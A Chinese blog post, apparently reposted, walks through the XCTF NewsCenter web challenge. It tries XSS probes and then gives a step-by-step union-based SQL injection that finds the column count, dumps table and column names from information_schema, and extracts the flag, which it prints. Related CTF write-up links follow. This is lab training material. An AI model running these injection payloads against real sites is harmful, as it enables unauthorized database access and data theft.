2. 程式人生 > 其它 >攻防世界:Web:NewsCenter靶場覆盤

攻防世界:Web:NewsCenter靶場覆盤

阿新 發佈:2021-08-21
目錄

靶場內容:


需要吐槽一下,這個靶場我起碼進了五次,環境才沒有錯

漏洞分析

  • 拿到題目,是一個新聞搜尋框
  • 猜想可能有兩種漏洞:XSS漏洞和SQL漏洞
  • 嘗試XSS漏洞:<script>alert(1)</script>'"/><script>alert(1)</script>
  • 然後就報錯了呃
  • 嘗試SQL注入:(這裡註釋使用#,猜想--+可能被過濾)
    • 輸入 1 不報錯(廢話)
    • 輸入 1' 報錯,猜想可能是變數用單引號包裹的
    • 輸入 1" 不報錯,說明極有可能是單引號包裹
    • 輸入 1'# 不報錯,說明就是單引號包裹的
  • 使用語句:1' and 1=2 union select 1,2,3 #
    (試過好多遍了才知道是三位)判斷2,3被回顯出來了
  • 爆資料庫:1' and 1=2 union select 1,2,database() #
  • 爆表名:1' and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() #
  • 猜想我們的資料表應該是secret_table
  • 爆列名:1' and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() #
  • 此時看見了fl4g列,猜想這個是flag
  • 輸入1' and 1=2 union select 1,2,fl4g from secret_table#
  • 就可得到flag:QCTF{sq1_inJec7ion_ezzz}

本文來自部落格園,作者:{Zeker62},轉載請註明原文連結:https://www.cnblogs.com/Zeker62/p/15168294.html

相關推薦

攻防世界WebNewsCenter靶場

目錄靶場內容:漏洞分析 靶場內容: 需要吐槽一下,這個靶場我起碼進了五次,環境才沒有錯

攻防世界pwn題forgot

0x00檢視檔案資訊 該檔案是32位的,canary和PIE保護機制沒開。   0x01用IDA進行靜態分析

CTF-WEB攻防世界 ics-05(preg_replace() 函式 /e 漏洞)

目錄檔案包含響應頭偽造preg_replace() 函式獲取 flag 檔案包含 根據題目描述“其他破壞者會利用工控雲管理系統裝置維護中心的後門入侵系統”,開啟裝置維護中心後檢視 F12。

攻防世界web fakebook

自己做已經找到了SQL注入漏洞了,但是後面盲注太慢了而且發現並沒有什麼有用的資訊

攻防世界 web favorite-number

目錄題目剖析漏洞分析注入payload 題目剖析 這是一道PHP程式碼審計題目 <?php //php5.5.9

攻防世界web FlatScience

目錄題目分析目錄掃描檢查頁面程式碼審計SQL注入 題目分析 拿到題目,就有很多按鈕可以點選

攻防世界-webwarmup

題目描述 暫無 題目截圖 解題思路 訪問標題連結,發現圖片是個大大笑臉。直接看原始碼。

攻防世界-webPHP2

題目描述 暫無 題目截圖 只提示了一句話Can you anthenticate to this website? 估計是讓認證繞過,登入網站。

攻防世界-webunserialize3

題目描述 暫無 題目截圖 根據題目名稱,應該就是php反序列化。 解題思路 class xctf

攻防世界web: unserialize3

知識點   序列化 serialize()函式用於序列化物件或陣列,並返回一個字串。

攻防世界-webWeb_python_template_injection

題目描述 暫無 題目截圖 解題思路 題目提示是python模板注入 嘗試訪問不存在路徑,看看404頁面

攻防世界新手區 | when_did_you_born

checksec檢視程式型別 有Canary,先看看程式邏輯 [*] \'/home/zowie/Downloads/when_did_you_born\'

攻防世界新手區 | guess number

checksec程式資訊 Arch:amd64-64-little RELRO:Partial RELRO Stack:Canary found NX:NX enabled PIE:PIE enabled

攻防世界新手區 | int_overflow

checksec: Arch:i386-32-little RELRO:Partial RELRO Stack:No canary found NX:NX enabled PIE:No PIE (0x8048000)

攻防世界新手區 | strings

checksec: Arch:amd64-64-little RELRO:Full RELRO Stack:Canary found NX:NX enabled PIE:No PIE (0x400000) IDA:

攻防世界新手區 | CGfsb

checksec Arch:i386-32-little RELRO:Partial RELRO Stack:Canary found NX:NX enabled PIE:No PIE (0x8048000)

攻防世界進階區 | stack2

checksec Arch:i386-32-little RELRO:Partial RELRO Stack:Canary found NX:NX enabled PIE:No PIE (0x8048000)

攻防世界進階區 | Mary_Morton

這道題讓我重新學了一遍格式化字串漏洞,自學真的太頂了。 checksec開啟了canary

攻防世界新手區 | CRYPTO

在正式做題前先要大致瞭解一下CRYPTO 0x1: base64 將文字內容如題解密 Y3liZXJwZWFjZXtXZWxjb21lX3RvX25ld19Xb3JsZCF9

攻防世界進階區 | warmup

這道題感覺有點怪怪的,題目頁面並沒有給出附件,實驗了下可以開啟線上場景